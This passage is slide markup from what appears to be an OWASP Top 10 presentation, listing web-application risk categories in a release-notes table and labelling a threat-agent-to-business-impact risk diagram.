                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>A7</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" kern="1200" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t> – Insufficient Attack Protection (NEW)</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" b="1" kern="1200" dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="+mn-lt"/>
                        <a:ea typeface="+mn-ea"/>
                        <a:cs typeface="+mn-cs"/>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2">
                        <a:lumMod val="40000"/>
                        <a:lumOff val="60000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="2839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t>A8 – Cross-Site Request Forgery (CSRF)</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" b="1" kern="1200" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="+mn-lt"/>
                        <a:ea typeface="+mn-ea"/>
                        <a:cs typeface="+mn-cs"/>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t>A8 – Cross-Site Request Forgery (CSRF)</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" b="1" kern="1200" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="+mn-lt"/>
                        <a:ea typeface="+mn-ea"/>
                        <a:cs typeface="+mn-cs"/>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r>
              <a:tr h="2839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t>A9 – Using Components with Known Vulnerabilities</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" b="1" kern="1200" dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="+mn-lt"/>
                        <a:ea typeface="+mn-ea"/>
                        <a:cs typeface="+mn-cs"/>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tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>A9 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" kern="1200" dirty="0" smtClean="0"/>
                        <a:t>– Using Components with Known Vulnerabilities</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" b="1" kern="1200" dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="+mn-lt"/>
                        <a:ea typeface="+mn-ea"/>
                        <a:cs typeface="+mn-cs"/>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r>
              <a:tr h="2839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tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>A10 – </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" kern="1200" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>Unvalidated</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" kern="1200" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t> Redirects and Forwards - Dropped</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tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>A10 – </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" kern="1200" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>Underprotected</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" kern="1200" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t> APIs (NEW)</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2">
                        <a:lumMod val="40000"/>
                        <a:lumOff val="60000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Title 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Release Notes</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Text Placeholder 8"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="1295400" cy="830997"/>
          </a:xfrm>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dirty="0" smtClean="0"/>
              <a:t>RN</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="3" name="Straight Arrow Connector 2"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3124200" y="7315200"/>
            <a:ext cx="381000" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="28575">
            <a:solidFill>
              <a:srgbClr val="3C752E"/>
            </a:solidFill>
            <a:headEnd type="oval"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Elbow Connector 10"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipV="1">
            <a:off x="2857500" y="7658100"/>
            <a:ext cx="838200" cy="152400"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="28575">
            <a:solidFill>
              <a:srgbClr val="3C752E"/>
            </a:solidFill>
            <a:headEnd type="oval" w="sm" len="sm"/>
            <a:tailEnd type="none"/>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304800" y="2085975"/>
            <a:ext cx="6172200" cy="2105025"/>
            <a:chOff x="304800" y="2085975"/>
            <a:chExt cx="6172200" cy="2105025"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="2" name="Group 115"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="2362201" y="3343275"/>
              <a:ext cx="1142999" cy="390260"/>
              <a:chOff x="2418" y="2736"/>
              <a:chExt cx="750" cy="295"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="5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smtClean="0">
                    <a:solidFill>
                      <a:schemeClr val="accent1">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>  Weakness</a:t>
                </a:r>
                <a:endParaRPr lang="en-US" sz="900" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="accent1">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="5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endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="6" name="Group 63"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="495300" y="2505075"/>
              <a:ext cx="139700" cy="304800"/>
              <a:chOff x="96" y="1344"/>
              <a:chExt cx="288" cy="624"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="7"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p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="8"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sp>
            <p:nvSpPr>
              <p:cNvPr id="9"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sp>
            <p:nvSpPr>
              <p:cNvPr id="10"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sp>
            <p:nvSpPr>
              <p:cNvPr id="11"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grpSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="12" name="AutoShape 163"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1371600" y="2490788"/>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smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="accent1">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>Attack</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="17" name="Rectangle 89"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="304800" y="2085975"/>
              <a:ext cx="516488" cy="30232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smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="tx2"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>Threat</a:t>
              </a:r>
              <a:br>
                <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="tx2"/>
                  </a:solidFill>
                </a:rPr>
              </a:br>
              <a:r>
                <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="tx2"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>Agents</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="19" name="AutoShape 142"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5715000" y="2466975"/>
              <a:ext cx="762000" cy="381000"/>
            </a:xfrm>
            <a:prstGeom prst="foldedCorner">
              <a:avLst>
                <a:gd name="adj" fmla="val 125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smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="accent1">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>Impact</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="13" name="Group 115"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="2362201" y="2466971"/>
              <a:ext cx="1142999" cy="390260"/>
              <a:chOff x="2418" y="2736"/>
              <a:chExt cx="750" cy="295"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="3"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smtClean="0">
                    <a:solidFill>
                      <a:schemeClr val="accent1">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>  Weakness</a:t>
                </a:r>
                <a:endParaRPr lang="en-US" sz="900" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="accent1">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="4"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endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="15" name="Group 63"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="498475" y="2924175"/>
              <a:ext cx="139700" cy="304800"/>
              <a:chOff x="96" y="1344"/>
              <a:chExt cx="288" cy="624"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="25"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p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="26"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sp>
            <p:nvSpPr>
              <p:cNvPr id="27"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sp>
            <p:nvSpPr>
              <p:cNvPr id="28"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sp>
            <p:nvSpPr>
              <p:cNvPr id="29"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grpSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="40" name="AutoShape 163"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1371600" y="2924175"/>
              <a:ext cx="838200" cy="357187"/>
            </a:xfrm>
            <a:prstGeom prst="rightArrowCallout">
              <a:avLst>
                <a:gd name="adj1" fmla="val 20889"/>
                <a:gd name="adj2" fmla="val 24667"/>
                <a:gd name="adj3" fmla="val 34667"/>
                <a:gd name="adj4" fmla="val 8013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smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="accent1">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>Attack</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="41" name="Rectangle 89"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1354769" y="2085975"/>
              <a:ext cx="550151" cy="30232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smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="tx2"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>Attack</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0">
                <a:lnSpc>
                  <a:spcPts val="800"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="tx2"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>Vectors</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="42" name="Rectangle 89"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2727423" y="2085975"/>
              <a:ext cx="777777" cy="30232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smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="tx2"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>Security</a:t>
              </a:r>
              <a:br>
                <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="tx2"/>
                  </a:solidFill>
                </a:rPr>
              </a:br>
              <a:r>
                <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="tx2"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>Weaknesses</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="43" name="Rectangle 89"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4621087" y="2085975"/>
              <a:ext cx="636713" cy="30232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smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="tx2"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>Technical</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0">
                <a:lnSpc>
                  <a:spcPts val="800"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="tx2"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>Impacts</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="44" name="Rectangle 89"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5809634" y="2085975"/>
              <a:ext cx="599843" cy="30232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smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="tx2"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>Business</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0">
                <a:lnSpc>
                  <a:spcPts val="800"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="tx2"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>Impacts</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="45" name="AutoShape 163"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1371600" y="3352800"/>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smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="accent1">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>Attack</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="59" name="AutoShape 142"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5715000" y="29241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smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="accent1">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>Impact</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="60" name="AutoShape 142"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5715000" y="33813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smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="accent1">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>Impact</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="61" name="AutoShape 85"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4648200" y="34861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smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="accent1">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:cs typeface="+mn-cs"/>
                </a:rPr>
                <a:t>Asset</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:cs typeface="+mn-cs"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="62" name="AutoShape 85"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4648200" y="3076575"/>
              <a:ext cx="685800" cy="428655"/>
            </a:xfrm>
            <a:prstGeom prst="can">
              <a:avLst>
                <a:gd name="adj" fmla="val 250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smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="accent1">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:cs typeface="+mn-cs"/>
                </a:rPr>
                <a:t>Function</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:cs typeface="+mn-cs"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="64" name="AutoShape 85"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4648200" y="26860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smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="accent1">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:cs typeface="+mn-cs"/>
                </a:rPr>
                <a:t>Asset</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:cs typeface="+mn-cs"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="21" name="Group 115"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="2362201" y="2905125"/>
              <a:ext cx="1142999" cy="390260"/>
              <a:chOff x="2418" y="2736"/>
              <a:chExt cx="750" cy="295"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="6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smtClean="0">
                    <a:solidFill>
                      <a:schemeClr val="accent1">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>  Weakness</a:t>
                </a:r>
                <a:endParaRPr lang="en-US" sz="900" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="accent1">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="6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endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="52" name="AutoShape 140"/>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks noChangeShapeType="1"/>
              <a:stCxn id="40" idx="3"/>
              <a:endCxn id="66" idx="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2209800" y="3102769"/>
              <a:ext cx="490729" cy="211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sp>
          <p:nvSpPr>
            <p:cNvPr id="79" name="Rectangle 116"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3733800" y="247650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smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="accent1">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>Control</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="80" name="Rectangle 116"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3733799" y="291465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smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="accent1">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>Control</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="81" name="Rectangle 116"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3733800" y="3810000"/>
              <a:ext cx="457200" cy="3810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smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="accent1">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>Control</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
